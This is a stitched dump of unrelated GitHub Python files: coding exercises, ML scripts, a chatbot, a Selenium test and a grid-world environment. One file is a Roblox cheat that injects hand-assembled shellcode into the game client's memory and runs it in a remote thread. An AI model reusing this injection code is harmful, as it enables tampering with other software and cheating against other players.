self.image = image\n self._close_source()\n self.source = None\n self.source_is_stream = False\n\n def set_source(self, source, strip=False):\n if self.image:\n self.image = None\n self.need_clear_image = True\n self._close_source()\n\n self.max_width = 0\n if isinstance(source, str):\n self.source_is_stream = False\n self.lines = source.splitlines()\n if self.lines:\n self.max_width = max(len(line) for line in self.lines)\n elif hasattr(source, '__getitem__'):\n self.source_is_stream = False\n self.lines = source\n if self.lines:\n self.max_width = max(len(line) for line in source)\n elif hasattr(source, 'readline'):\n self.source_is_stream = True\n self.lines = []\n else:\n self.source = None\n self.source_is_stream = False\n return False\n self.markup = 'ansi'\n\n if not self.source_is_stream and strip:\n self.lines = [line.strip() for line in self.lines]\n\n self.source = source\n return True\n\n def click(self, event):\n n = 1 if event.ctrl() else 3\n direction = event.mouse_wheel_direction()\n if direction:\n self.move(down=direction * n)\n return True\n\n def _get_line(self, n, attempt_to_read=True):\n assert isinstance(n, int), n\n try:\n return self.lines[n]\n except (KeyError, IndexError):\n if attempt_to_read and self.source_is_stream:\n try:\n for line in self.source:\n if len(line) > self.max_width:\n self.max_width = len(line)\n self.lines.append(line)\n if len(self.lines) > n:\n break\n except (UnicodeError, IOError):\n pass\n return self._get_line(n, attempt_to_read=False)\n return \"\"\n\n def _generate_lines(self, starty, startx):\n i = starty\n if not self.source:\n raise StopIteration\n while True:\n try:\n line = self._get_line(i).expandtabs(4)\n if self.markup == 'ansi':\n line = ansi.char_slice(line, startx, self.wid) + ansi.reset\n else:\n line = line[startx:self.wid + startx]\n yield line.rstrip().replace('\\r\\n', '\\n')\n except IndexError:\n raise StopIteration\n i += 1\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ranger_ranger/ranger-master/ranger/gui/widgets/pager.py","file_name":"pager.py","file_ext":"py","file_size_in_byte":8082,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"17639387566","text":"\"\"\"\n\ncreated by huash06 at 2015-07-14\n\n\"\"\"\n__author__ = 'huash06'\n\nimport os\nimport sys\nimport functools\nimport collections\nimport itertools\n\n# sys.stdin = open(\"input.txt\", \"r\")\n\n\ndef collectApple(tree):\n if not tree:\n return 0\n left = sorted(filter(lambda x: x[0] < 0, tree))\n right = sorted(filter(lambda x: x[0] > 0, tree))\n\n res = 0\n if len(left) > len(right):\n res += sum([x[1] for x in right])\n res += sum([x[1] for x in left[len(left) - len(right) - 1:]])\n else:\n res += sum([x[1] for x in left])\n res += sum([x[1] for x in right[:min(len(left) + 1, len(right))]])\n return res\n\n\nN = int(input())\n\ntree = []\nfor i in range(N):\n tree.append([int(x) for x in input().split()])\nprint(collectApple(tree))\n\n\n\n\n","repo_name":"shhuan/algorithms","sub_path":"py/codeforces/312A.py","file_name":"312A.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4335406231","text":"# fit the sigmoid curve and calculate decision boundary using given dataset\n\n# a cheat sheet:\n# in an optimization loop\n# first calculate hypothesis for each datapoint x in X: h = 1 / (1 + exp(-theta0-theta1*x))\n# then calculate crossentropy: -y*log(h) - (1-y)*log(1-h)\n# and cost: sum(crossentropy) / len(x)\n# next calculate derivatives for theta 0 and theta1 (similar to those in linear regression)\n# theta0_deriv = sum(h - y) / len(y), theta1_deriv = sum((h-y)*X)\n# and then update tbheta weights\n# theta = theta - lr*theta_deriv\n\n# check if cost is getting lower through iterations\n# if not, try to modify the learning rate\n\n# calculating decision boundary might look like this:\n# theta[0] + theta[1]*x = 0\n# theta[1]*x = -theta[0]\n# x = -theta[0]/theta[1]\n\n# the result might look like below\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nX = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 15, 25], dtype=np.float32)\ny = np.array([0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1], dtype=np.float32)\n\ntheta = np.array([0, 0], dtype=np.float32)\n\n# optimization loop\niterations = 10000\nmin_cost = 100\neps = 0.00001\nlr = 0.1\ntheta_deriv = [0, 0]\nfor i in range(iterations):\n\n h = 1/(1 + np.exp(-theta[0] - theta[1] * X))\n crossentropy = -y * np.log(h + eps) - (1 - y) * np.log(1 - h + eps)\n cost = sum(crossentropy) / len(X)\n\n theta_deriv[0] = sum(h - y) / len(y)\n theta_deriv[1] = sum((h - y) * X) / len(y)\n\n for j in range(len(theta)):\n theta[j] = theta[j] - lr * theta_deriv[j]\n\n print(\"iteration: \", str(i + 1), \", cost: \", cost)\n\n if np.abs(min_cost - cost) < eps:\n break\n\n min_cost = cost\n\nprint(theta)\n\nx_linspace = np.linspace(min(X), max(X), 100)\ny_linspace = 1 / (1 + np.exp(-theta[0] - theta[1]*x_linspace))\n\nplt.plot(X, y, 'x')\nplt.plot(x_linspace, y_linspace, '-')\nborder_indexes = np.where(y_linspace >=0.5-eps)\n# print(border_indexes)\nplt.axvline(x=x_linspace[border_indexes[0][0]])\nplt.show()\n\n","repo_name":"DorotaDR/Machine_Learning_LAB","sub_path":"lab-logistic-reagression/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34307711551","text":"'''Wikifies given cluster'''\n\nfrom collections import Counter\nimport re\nimport nltk\nfrom nltk.collocations import *\n\nclass Wikification:\t\n\tdef __init__(self, events):\n\t\tself.stoplist = []\n\t\twith open(\"corpus/stopwords.txt\") as stopwords:\n\t\t\tfor stopword in stopwords:\n\t\t\t\tself.stoplist.append(stopword.strip())\n\t\tself.stoplist.extend(['http', 'het'])\n\t\tself.events = list(events)\n\t\tself.wikifi()\n\t\n\tdef wikifi(self):\n\t\tevents = []\n\t\t\n\t\tbigram_measures = nltk.collocations.BigramAssocMeasures()\n\n\t\tfor candidates, label in self.events:\n\t\t\ttweets = \"\"\n\t\t\tfor candidate in candidates:\n\t\t\t\ttweets += \" \"+ candidate['text'] \t\t\n\t\t\ttokens = self.tokenize(tweets)\n\t\t\tfinder = BigramCollocationFinder.from_words(tokens)\n\t\t\tstring = \"\"\n\t\t\tfinder.apply_freq_filter(3)\n\t\t\tfor firstword, secondword in finder.nbest(bigram_measures.pmi, 10):\n\t\t\t\tstring += \" {} {} \".format(firstword, secondword)\n\t\t\t#ngrams = []\n\t\t\t#for ngram, score in self.ngrams(tweets,3).most_common(50):\t\t\t\n\t\t\t\t#ngrams.append((' '.join(ngram)))\n\n\t\t\tevents.append((candidates, label, str(string)))\n\t\treturn events\n\n\n\n\tdef tokenize(self, string):\n\t\tstring = re.sub(r'^https?:\\/\\/.*[\\r\\n]*', '', string, flags=re.MULTILINE)\n\t\tstring = re.sub('[!@#$.,?]', '', string)\n\t\tstring = self.convert(string)\n\t\treturnList = [token for token in string.split() if token not in self.stoplist and len(token) > 2 and token.isalpha() ]\n\t\treturn returnList\n\n\tdef convert(self, token):\n\t s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1 \\2', token)\n\t return re.sub('([a-z0-9])([A-Z])', r'\\1 \\2', s1).lower()\n\n\tdef eventDict(self):\n\t\treturn defaultdict(list)\n\n\tdef getWiki(self):\n\t\treturn self.wikifi()\n\n\tdef ngrams(self, tweets, n):\n\t\tngrams = Counter()\t\n\t\tfor iteration in range(n):\n\t\t\tfor tweet in tweets:\n\t\t\t\tngram = zip(*[self.prepareTokens(tweet['text'])[i:] for i in range(iteration)])\n\t\t\t\tngramFiltered = [token for token in ngram if token not in self.stoplist]\n\t\t\t\tngrams.update(ngramFiltered)\n\t\treturn ngrams\n\n\tdef prepareTokens(self, tweet):\n\n\t\n\t\treturn tweet.split()","repo_name":"daviddekleer/EventDetective","sub_path":"Wikification.py","file_name":"Wikification.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38273696909","text":"import os\nimport aiml\n\nBRAIN_FILE= \"../brain.dump\"\n\nk = aiml.Kernel()\n\n# Для увеличения скорости запуска бота необходимо\n# можно сохранить разобранные файлы аимл как\n# свалка. Этот код проверяет, существует ли дамп и\n# в противном случае загружает аимл из файлов xml\n# и сохраняет дамп мозга.\nif os.path.exists(BRAIN_FILE):\n print(\"Loading from brain file: \" + BRAIN_FILE)\n k.loadBrain(BRAIN_FILE)\nelse:\n print(\"Parsing aiml files\")\n k.bootstrap(learnFiles=\"std-startup.aiml\", commands=\"load aiml b\")\n print(\"Saving brain file: \" + BRAIN_FILE)\n k.saveBrain(BRAIN_FILE)\n\n\ndef getAimlResponse(message):\n response = k.respond(message)\n return response","repo_name":"Sevochka/chat-bot","sub_path":"bots/aiml_bot.py","file_name":"aiml_bot.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37440604086","text":"#funtion returns weather items are sorted or not boolean\n#creating the function and passing in items\ndef is_sorted(items):\n # setting variable copy to equal items\n copy = items[:]\n #calling sort method on copy\n copy.sort()\n # if copy is equal to items it returns true \n return copy == items\n\ndef bubble_sort(items):\n #set is sorted to true\n is_sorted = True\n # set a counter to 0\n counter = 0\n # while items_is_sorted we want to then change is sorted to false\n while(is_sorted):\n #set is sorted to false \n is_sorted = False\n # this is the for loop to loop trhough the items\n for i in range(len(items) - counter - 1):\n #if the item we are looking at is larger thane the item to its right we want to swap them \n if items[i] > items[i+1]:\n # swap the items positioins\n items[i], items[i+1] = items[i+1], items[i]\n # is sorted now becomes troue\n is_sorted = True\n # incremantation of the counter to move though the array\n counter += 1\n\ndef selection_sort(items):\n #finding the minimum item and swaping it with the first unsorted item and repeating until all items are in soreted order\n #for loop to loop throught the items\n items_length = range(0, len(items)-1)\n for i in items_length:\n #set min value to i\n min_value = i\n#nested for loop to set j value\n for j in range(i+1, len(items)):\n if items[j] < items[min_value]:\n min_value = j\n \n items[min_value], items[i] = items[i], items[min_value]\n return items\n\n\ndef insertion_sort(items):\n item_length = range(1, len(items))\n for i in item_length:\n #element to be compared\n unsorted_value = items[i]\n\n #comparing the current element with the sorted portion and swapping\n\n while items[i-1] > unsorted_value and i > 0:\n items[i], items[i-1] = items[i-1], items[i]\n i -= 1\n #returning items \n return items","repo_name":"MariomcgeeArt/CS2.1-sorting_algorithms-","sub_path":"iterative_sorting2.py","file_name":"iterative_sorting2.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30638522130","text":"\"\"\"\nSolution for 917. Reverse Only Letters\n\"\"\"\n\nclass Solution:\n \"\"\"\n Runtime: 32 ms, faster than 91.10% of Python3 online submissions for Reverse Only Letters.\n Memory Usage: 13.1 MB, less than 82.16% of Python3 online submissions for Reverse Only Letters.\n \"\"\"\n def reverseOnlyLetters(self, S):\n \"\"\"\n Given a string S, return the \"reversed\" string where all characters that are not a letter\n stay in the same place, and all letters reverse their positions.\n\n\n\n Example 1:\n\n Input: \"ab-cd\"\n Output: \"dc-ba\"\n Example 2:\n\n Input: \"a-bC-dEf-ghIj\"\n Output: \"j-Ih-gfE-dCba\"\n Example 3:\n\n Input: \"Test1ng-Leet=code-Q!\"\n Output: \"Qedo1ct-eeLg=ntse-T!\"\n Args:\n S: str value to reverse only letters\n\n Returns:\n str: where all the letters from S are reversed\n \"\"\"\n i, j = 0, len(S) - 1\n S = list(S)\n\n while i <= j:\n while i < len(S) and not S[i].isalpha():\n i += 1\n\n if i <= j:\n while j >= 0 and not S[j].isalpha():\n j -= 1\n\n S[i], S[j] = S[j], S[i]\n i += 1\n j -= 1\n else:\n break\n\n return ''.join(S)\n","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/917_reverse_only_letters.py","file_name":"917_reverse_only_letters.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23606544621","text":"\"\"\" Problem specific image split, Scope of improvement and generalization\"\"\"\nfrom PIL import Image\nimport os\n\n\nclass imagesplit:\n\n def split_image_by_map(self, image_path, map_file_name, output_folder, identifier):\n \"\"\"\n Split parking lot image based on one map file\n :param image_path:\n :param map_file_name:\n :param output_folder:\n :param identifier:\n :return:\n \"\"\"\n img = Image.open(image_path)\n basename = os.path.basename(image_path)\n filename, extension = os.path.splitext(basename)\n\n with open(map_file_name) as fp:\n count = 1\n for line in fp:\n coors = line.split(\",\")\n coors = (int(coors[0]), int(coors[1]), int(coors[2]), int(coors[3]))\n img.crop(coors).save(output_folder + identifier + str(count) + extension)\n count += 1\n\n def split_image(self, image_path, input_map_path, output_image_path):\n \"\"\"\n Split images based on map file input\n :param image_path:\n :param input_map_path:\n :param output_image_path:\n :return:\n \"\"\"\n basename = os.path.basename(image_path)\n filename, extension = os.path.splitext(basename)\n image_dir = output_image_path + filename + \"/\"\n\n if not os.path.exists(image_dir):\n os.makedirs(image_dir)\n\n self.split_image_by_map(image_path, input_map_path + \"/L1.txt\", image_dir, \"A_\")\n self.split_image_by_map(image_path, input_map_path + \"/L2.txt\", image_dir, \"B_\")\n self.split_image_by_map(image_path, input_map_path + \"/L3.txt\", image_dir, \"C_\")\n\n return image_dir\n","repo_name":"jaymaity/CarDetectionInParkinglot","sub_path":"common/imageprocess/imagesplit.py","file_name":"imagesplit.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"74034608374","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport pymc3 as pm\nimport theano\nimport theano.tensor as tt\n\nfrom .utils import format_data\n\n\ndef make_ind_model(subject_data, subject_gaze_data, gaze_bias=True, zerorol=1e-10):\n \"\"\"\n Make single subject probabilistic satisficing choice model.\n\n Args\n ---\n subject_data_df (dataframe): aggregate response\n data of a single subject\n subject_gaze_data (dataframe): aggregate gaze\n data of a single subject\n gaze_bias (bool): whether to activate gaze bias\n or to set gamma=1 and zeta=0\n zerotol (float): numerical stability term\n\n Returns\n ---\n PyMC3 model object\n \"\"\"\n\n assert len(subject_data['subject'].unique()) == 1, 'data_df contains more than 1 subject.'\n\n # format data\n data_dict = format_data(subject_data, subject_gaze_data)\n\n # make ind model\n with pm.Model() as ind_model:\n\n # likelihood mixture\n p_error = pm.Deterministic('p_error', tt.constant(0.05, dtype='float32'))\n\n # model paramaters\n v = pm.Uniform('v', 0, 0.001, testval=1e-7)\n alpha = pm.Uniform('alpha', 0, 0.001, testval=1e-7)\n tau = pm.Uniform('tau', 0, 10, testval=1)\n if gaze_bias:\n gamma = pm.Uniform('gamma', 0, 1, testval=0.5)\n zeta = pm.Uniform('zeta', 0, 10, testval=0.5)\n else:\n gamma = pm.Deterministic('gamma', tt.constant(1, dtype='float32'))\n zeta = pm.Deterministic('zeta', tt.constant(0, dtype='float32'))\n\n # stopping probability\n def stopping_probability(gaze_t, value_t, rt):\n time = tt.arange(1,gaze_t.shape[-1]+1)[None,:]\n # exclude items that were not looked at so far\n C = tt.where(tt.eq(gaze_t, tt.zeros_like(gaze_t)),\n tt.zeros_like(gaze_t),\n gaze_t * (value_t + zeta) + (1 - gaze_t) * gamma * value_t)\n q = v * time + alpha * tt.max(C, axis=1)\n q = tt.clip(q, 0, 1)\n Q = tt.cumprod(1 - q, axis=1)\n Q = tt.clip(Q, 0, 1)\n q_corrected = (Q[tt.cast(tt.arange(Q.shape[0]), dtype='int32'), tt.cast(rt-2, dtype='int32')] *\n q[tt.cast(tt.arange(q.shape[0]), dtype='int32'), tt.cast(rt-1, dtype='int32')])\n return q_corrected, C\n\n # logp\n def logp_ind(rt,\n choice,\n gaze_t,\n value_t,\n error_ll,\n zerotol):\n # compute stopping probability\n n_trials = value_t.shape[0]\n n_items = value_t.shape[1]\n q, C = stopping_probability(gaze_t, value_t, rt)\n # compute softmax choice probabilities\n sigma, _ = theano.scan(lambda i, tau, C, rt, n_items:\n tt.nnet.nnet.softmax(tau*C[tt.cast(tt.repeat(i, n_items), dtype='int32'),\n tt.arange(n_items, dtype='int32'),\n tt.cast(tt.repeat(rt[i]-1, n_items), dtype='int32')]).flatten(),\n sequences=[tt.cast(tt.arange(n_trials), dtype='int32')],\n non_sequences=[tau, C, rt, n_items])\n # combine with choice probabilities\n p = q * sigma[tt.arange(n_trials, dtype='int32'), tt.cast(choice, dtype='int32')]\n # mix likelihoods\n l = ((1-p_error) * p) + (p_error * error_ll)\n # safety\n l = tt.where(tt.isnan(l), 0., l)\n l = tt.where(tt.isinf(l), 0., l)\n return tt.log(l + zerotol)\n\n # data\n obs = pm.DensityDist('obs',\n logp=logp_ind,\n observed=dict(rt=data_dict['rt'],\n choice=data_dict['choice'],\n gaze_t=data_dict['gaze_t'],\n value_t=data_dict['value_t'],\n error_ll=data_dict['error_ll'],\n zerotol=zerorol))\n\n return ind_model\n","repo_name":"athms/many-item-choice","sub_path":"src/models/probabilistic_satisficing/make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"5625347140","text":"import time\nimport unittest\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom Funciones.Funciones import FuncionesGlobales\nfrom selenium.webdriver import ActionChains\n\nt=2\n\nclass BaseTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.driver = webdriver.Chrome(executable_path=\"C:\\Drivers\\chromedriver.exe\")\n self.driver.maximize_window()\n\n def test1(self):\n driver = self.driver\n f = FuncionesGlobales(driver)\n f.Navegar(\"https://demoqa.com/buttons\",t)\n\n f.Mouse_Double_Click(\"id\",\"doubleClickBtn\",t)\n\n \"\"\"\n elemento=driver.find_element(By.ID, \"doubleClickBtn\")\n act=ActionChains(driver)\n act.double_click(elemento).perform()\n \"\"\"\n time.sleep(t)\n\n def tearDown(self) -> None:\n d = self.driver\n d.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"LABUEZO/Aprendiendo-Git-GitHub","sub_path":"Mouse_actions/Double_click.py","file_name":"Double_click.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30028115403","text":"from Exploit import roblox\nfrom Instance import Instance\nfrom Memory import GetDataModel, float_to_hex\nfrom Players import Players\n\n\nDataModel = Instance(GetDataModel())\n\nprint(roblox.d2h(DataModel.getAddress()))\nPlayers = Players(DataModel.FindFirstChild(\"Players\"))\nworkspace = DataModel.GetChildren()[0]\n\nlocalPlayer = Players.GetLocalPlayer()\nplayerChar = workspace.FindFirstChild(localPlayer.GetName())\n\ndef BreakJoints(character : Instance):\n NewMemoryRegion = roblox.Program.allocate(100)\n NewMemAddress = NewMemoryRegion\n \n InstanceAddress = character.getAddress() #Change This\n FunctionAddress = character.GetBoundFunction(\"BreakJoints\").GetFunc()\n \n HexArray = ''\n MovIntoEcxOp = 'B9' + roblox.hex2le(roblox.d2h(InstanceAddress))\n CallOp = 'E8' + roblox.hex2le(roblox.calcjmpop(roblox.d2h(FunctionAddress),roblox.d2h(NewMemAddress + 5)))\n StoreOp = 'A3' + roblox.hex2le(roblox.d2h(NewMemAddress + 0x30))\n RetOp = 'C3'\n HexArray = MovIntoEcxOp + CallOp + StoreOp + RetOp\n roblox.Program.write_bytes(NewMemAddress,bytes.fromhex(HexArray),roblox.gethexc(HexArray))\n roblox.Program.start_thread(NewMemAddress)\n roblox.Program.free(NewMemAddress)\n\n\ndef MoveTo(character : Instance):\n NewMemoryRegion = roblox.Program.allocate(100)\n NewMemAddress = NewMemoryRegion\n \n InstanceAddress = character.getAddress() #Change This\n FunctionAddress = character.GetBoundFunction(\"MoveTo\").GetFunc()\n testx = 3.0\n testy = 4.0\n testz = 5.0\n HexArray = ''\n MovIntoEcxOp = 'B9' + roblox.hex2le(roblox.d2h(InstanceAddress))\n PushOPX = '68' + roblox.hex2le(roblox.d2h(int(float_to_hex(testx), 16)))\n PushOPY = '68' + roblox.hex2le(roblox.d2h(int(float_to_hex(testy), 16)))\n PushOPZ = '68' + roblox.hex2le(roblox.d2h(int(float_to_hex(testz), 16)))\n CallOp = 'E8' + roblox.hex2le(roblox.calcjmpop(roblox.d2h(FunctionAddress),roblox.d2h(NewMemAddress + 20)))\n StoreOp = 'A3' + roblox.hex2le(roblox.d2h(NewMemAddress + 0x30))\n RetOp = 'C3'\n HexArray = MovIntoEcxOp + PushOPZ + PushOPY + PushOPX + CallOp + StoreOp + RetOp\n #print(StoreOp)\n roblox.Program.write_bytes(NewMemAddress,bytes.fromhex(HexArray),roblox.gethexc(HexArray))\n #print(len(bytes.fromhex(HexArray)))\n print(roblox.d2h(NewMemAddress))\n roblox.Program.start_thread(NewMemAddress)\n returnValue = roblox.DRP(NewMemAddress + 0x30)\n roblox.Program.free(NewMemAddress)\n return returnValue\n\nMoveTo(playerChar)","repo_name":"ElCapor/bloxlib","sub_path":"breakjoints.py","file_name":"breakjoints.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"4373248982","text":"import numpy as np\nfrom gym import spaces\nimport gensim.downloader as api\n\nfrom mini_behavior.sampling import *\nfrom mini_behavior.envs.fixed_scene import FixedEnv\nfrom mini_behavior.objects import OBJECT_TO_IDX, IDX_TO_OBJECT\nfrom mini_behavior.grid import TILE_PIXELS\n\nfrom memsearch.graphs import NodeType, RECIPROCAL_EDGE_TYPES\n\nTILE_PIXELS = 32\n\nEDGE_TYPE_TO_FUNC = {\n \"onTop\": put_ontop,\n \"in\": put_inside,\n \"contains\": put_contains,\n \"under\": put_under,\n}\n\n\nclass SMGFixedEnv(FixedEnv):\n def __init__(self, scene_sampler, scene_evolver, encode_obs_im=False, mission_mode='one_hot', scene=None, set_goal_icon=False, env_evolve_freq=100):\n self.scene_sampler = scene_sampler\n self.scene_evolver = scene_evolver\n\n self.scene = self.scene_sampler.sample() if scene is None else scene\n self.scene_evolver.set_new_scene(self.scene)\n\n self.env_evolove_freq = env_evolve_freq\n self.node_to_obj = None\n self.moved_objs = None\n\n num_objs = self.get_num_objs()\n self.mission_mode = mission_mode\n self.encode_obs_im = encode_obs_im\n\n self.initialized = False\n self.set_goal_icon = set_goal_icon\n\n super().__init__(num_objs=num_objs, agent_view_size=7)\n\n def validate_scene(self):\n # Check scene\n all_furniture_nodes = self.scene.scene_graph.get_nodes_with_type(NodeType.FURNITURE)\n \n for fn in all_furniture_nodes:\n obj_children = [node for node in fn.get_children_nodes() if node.type == NodeType.OBJECT]\n if len(obj_children) > 4:\n return False\n return True\n \n def step(self, action):\n obs, reward, done, info = super().step(action)\n # if env_evolve_freq = -1, don't evolve env during steps, only during resets\n if self.step_count > 1 and self.env_evolove_freq != -1 and self.step_count % self.env_evolove_freq == 0:\n self.evolve()\n return obs, reward, done, info\n \n def _reward(self):\n return -1\n \n def _gen_objs(self):\n super()._gen_objs()\n if self.node_to_obj is not None:\n self.graph_to_grid()\n\n def _set_obs_space(self):\n assert self.mission_mode in ['one_hot', 'word_vec', 'int'], \"Only three modes supported: one hot, word vec or integer.\"\n \n if self.mission_mode == 'word_vec':\n self.word2vec_model = api.load(\"glove-twitter-25\")\n mission_observation_space = spaces.Box(\n low=-1,\n high=1,\n shape=(25),\n dtype='float32'\n )\n elif self.mission_mode == 'int':\n mission_observation_space = spaces.Discrete(len(IDX_TO_OBJECT))\n elif self.mission_mode == 'one_hot':\n mission_observation_space = spaces.Box(\n low=0,\n high=1,\n shape=(len(IDX_TO_OBJECT),),\n dtype='int'\n )\n else:\n assert \"need valid obs mode for mission\"\n if self.encode_obs_im: \n image_observation_space = spaces.Box(\n low=0,\n high=255,\n shape=(self.agent_view_size, self.agent_view_size, 3),\n dtype=np.uint8\n )\n else:\n image_observation_space = spaces.Box(\n low=0,\n high=255,\n shape=(self.agent_view_size * TILE_PIXELS, self.agent_view_size * TILE_PIXELS, 3),\n dtype=np.uint8\n )\n\n self.observation_space = spaces.Dict({\n \"direction\": spaces.Box(low=0, high=4, shape=(), dtype=np.uint8),\n 'image': image_observation_space,\n \"mission\": mission_observation_space,\n })\n \n\n def reset(self):\n # Hack around nightmare inheritance chain\n if not self.initialized:\n self._set_obs_space()\n \n # Reinitialize episode-specific variables\n self.agent_pos = (-1, -1)\n self.agent_dir = -1\n\n self.carrying = set()\n\n for obj in self.obj_instances.values():\n obj.reset()\n\n self.reward = 0\n\n # Generate a new random grid at the start of each episode\n # the same seed before calling env.reset()\n self._gen_grid(self.width, self.height)\n\n # generate furniture view\n # self.furniture_view = self.grid.render_furniture(tile_size=TILE_PIXELS, obj_instances=self.obj_instances)\n\n # These fields should be defined by _gen_grid\n assert self.agent_pos is not None\n assert self.agent_dir is not None\n\n # Check that the agent doesn't overlap with an object\n assert self.grid.is_empty(*self.agent_pos)\n\n # Step count since episode start\n self.step_count = 0\n self.episode += 1\n\n # Make node to obj list\n self.set_node_to_obj()\n # TODO not sure\n if not self.initialized:\n self.graph_to_grid()\n self.initialized = True\n #TODO: Set the mission THIS IS RANDOM AND NEEDS TO GET FIXED\n self.set_random_mission()\n\n # Return first observation\n obs = self.gen_obs()\n\n self.reward = 0\n self.step_count = 0\n self.episode += 1\n\n if self.node_to_obj is not None:\n self.evolve()\n\n return obs\n\n def get_num_objs(self):\n num_objs = {}\n\n for node in self.scene.scene_graph.get_nodes_with_type(NodeType.FURNITURE) + self.scene.scene_graph.get_nodes_with_type(NodeType.OBJECT):\n num_objs[node.label] = num_objs.get(node.label, 0) + 1\n\n return num_objs\n\n def set_node_to_obj(self):\n \"\"\"\n returns dict: key = node, value = obj_instance\n \"\"\"\n self.node_to_obj = {}\n\n for obj_type, objs in self.objs.items():\n nodes = self.scene.scene_graph.get_nodes_with_label(obj_type)\n\n assert len(objs) == len(nodes)\n for i in range(len(objs)):\n self.node_to_obj[nodes[i]] = objs[i]\n\n def graph_to_grid(self):\n \"\"\"\n NOTE: each edge obj has 1 parent node, and there are two edges between\n \"\"\"\n # for every furniture\n for furniture_node in self.scene.scene_graph.get_nodes_with_type(NodeType.FURNITURE):\n furniture = self.node_to_obj[furniture_node]\n # for every obj related to the furniture\n for obj_node in furniture_node.get_children_nodes():\n if obj_node.type == NodeType.OBJECT:\n obj = self.node_to_obj[obj_node]\n edges = obj_node.get_edges_to_me()\n if len(edges) > 0:\n edge = edges[0] # edge from obj to furniture\n assert edge.node2 == obj_node and edge.node1 == furniture_node\n EDGE_TYPE_TO_FUNC[RECIPROCAL_EDGE_TYPES[edge.type].value](self, obj, furniture) # put the obj on the grid\n else:\n print(\"Found 0 length edges\")\n\n def sample_to_grid(self, obj_node):\n if obj_node.type == NodeType.OBJECT:\n obj = self.node_to_obj[obj_node]\n if obj.cur_pos is not None and not obj.check_abs_state(state='inhandofrobot'):\n self.grid.remove(*obj.cur_pos, obj)\n\n edge = \\\n [e for e in obj_node.edges if (e.node1.type == NodeType.FURNITURE or e.node2.type == NodeType.FURNITURE)][0]\n\n if edge.node1.type == NodeType.FURNITURE:\n furniture_node = edge.node1\n edge_type = RECIPROCAL_EDGE_TYPES[edge.type]\n else:\n furniture_node = edge.node2\n edge_type = edge.type\n\n furniture = self.node_to_obj[furniture_node]\n EDGE_TYPE_TO_FUNC[edge_type.value](self, obj, furniture) # put the obj on the grid\n\n # uncomment for debugging\n # check_state(self, obj, furniture, edge_type)\n\n def evolve(self):\n # self.scene_evolver.scene = self.scene\n self.moved_objs = self.scene_evolver.evolve() # list of objects that were moved\n for obj_node in self.moved_objs:\n if obj_node not in list(self.node_to_obj.keys()): # if it is an added obj\n obj_instance = self.add_objs({obj_node.label: 1})[0]\n node_to_obj = self.node_to_obj\n node_to_obj[obj_node] = obj_instance\n self.node_to_obj = node_to_obj\n assert obj_node in list(self.node_to_obj.keys())\n self.sample_to_grid(obj_node)\n\n def _end_conditions(self):\n assert self.target_poses, \"This function should only be called after set_mission\"\n for target_pos in self.target_poses:\n if np.all(target_pos == self.front_pos) or self.step_count == self.max_steps:\n return True\n return False\n\n def set_mission(self, goal):\n \"\"\"\n Sets the mission of the env\n \"\"\"\n assert isinstance(goal, int) or isinstance(goal, str), \"Expecting either obj index or obj name\"\n \n if isinstance(goal, int): # Setting target by obj idx\n obj_label = IDX_TO_OBJECT[goal]\n obj_idx = goal\n elif isinstance(goal, str):\n obj_label = goal.lower()\n obj_idx = OBJECT_TO_IDX[obj_label]\n self.goal_obj_label = obj_label\n \n assert obj_label in self.objs.keys(), \"Goal object not sampled in current scene.\"\n self.target_poses = [target_obj.cur_pos for target_obj in self.objs[obj_label]]\n \n # Set mission\n if self.mission_mode == 'one_hot':\n self.mission = np.eye(len(IDX_TO_OBJECT))[obj_idx]\n elif self.mission_mode == 'int':\n self.mission = obj_idx\n elif self.mission_mode == 'word_vec':\n model_inps = obj_label.split('_')\n vec = np.zeros((25))\n for inp in model_inps:\n vec += self.word2vec_model.get_vector(inp, norm=True)\n vec /= len(model_inps)\n self.mission = vec\n else:\n assert \"Missing obs mode\"\n \n if self.set_goal_icon: # Set icon of goal object to be green\n goal_objs = self.objs[obj_label]\n for goal_obj in goal_objs:\n goal_obj.icon_color = 'green'\n \n def get_possible_missions(self):\n all_object_nodes = self.scene.scene_graph.get_nodes_with_type(NodeType.OBJECT)\n all_obj_labels = [self.node_to_obj[node].type for node in all_object_nodes]\n return all_obj_labels\n \n def set_random_mission(self):\n all_goals = self.get_possible_missions()\n random_goal = random.choice(all_goals)\n self.set_mission(random_goal)\n \n def set_mission_by_node(self, node):\n 